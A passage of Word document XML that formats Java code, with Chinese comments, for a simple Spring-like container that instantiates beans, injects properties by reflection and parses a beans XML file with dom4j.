          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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PropertyDescriptor[] ps = Introspector.getBeanInfo(bean.getClass()).getPropertyDescriptors();</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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PropertyDefinition propertyDefinition : beanDefinition.getPropertys())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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PropertyDescriptor properdesc : ps)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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (propertyDefinition.getName().equals(properdesc.getName()))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 xml:space="preserve">Method setter = properdesc.getWriteMethod(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>方法</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (setter != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)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 xml:space="preserve">Object injectBean = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (propertyDefinition.getRef() != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.equals(propertyDefinition.getRef().trim()))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injectBean = sigletons.get(propertyDefinition.getRef());</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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injectBean = ConvertUtils.convert(propertyDefinition.getValue(), properdesc.getPropertyType());</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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setter.setAccessible(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// private method</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 xml:space="preserve">setter.invoke(bean, injectBean); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>把引用对象注入到属性</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break</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exception e)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e.printStackTrace();</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>的实例化</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> instanceBeans()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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BeanDefinition beanDefinition : beanDefines)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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (beanDefinition.getClassName() != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.equals(beanDefinition.getClassName().trim()))</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sigletons.put(beanDefinition.getId(), Class.forName(beanDefinition.getClassName()).newInstance());</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exception e)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e.printStackTrace();</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>配置文件</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   *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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * @param filename</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> readXML(String filename)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 xml:space="preserve">SAXReader saxReader = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAXReader();</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Document document = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">URL xmlpath = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.getClass().getClassLoader().getResource(filename);</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document = saxReader.read(xmlpath);</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 xml:space="preserve">Map&lt;String, String&gt; nsMap = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> HashMap&lt;String, String&gt;();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nsMap.put(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"ns"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"http://www.springframework.org/schema/beans"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>加入命名空间</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XPath xsub = document.createXPath(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
